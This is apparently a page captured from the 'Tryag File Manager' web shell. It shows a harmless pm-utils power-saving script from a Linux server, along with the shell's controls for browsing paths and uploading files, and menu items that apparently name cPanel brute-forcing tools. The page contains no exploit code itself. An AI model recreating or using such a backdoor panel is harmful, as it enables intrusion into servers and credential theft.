Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
lib64
/
pm-utils
/
sleep.d
/
Or
Select Your Path :
Upload File :
New :
File
Dir
//lib64/pm-utils/sleep.d/00powersave
#!/bin/sh . "${PM_FUNCTIONS}" command_exists pm-powersave || exit $NA case $1 in suspend|hibernate) pm-powersave false ;; resume|thaw) pm-powersave ;; *) exit $NA ;; esac exit 0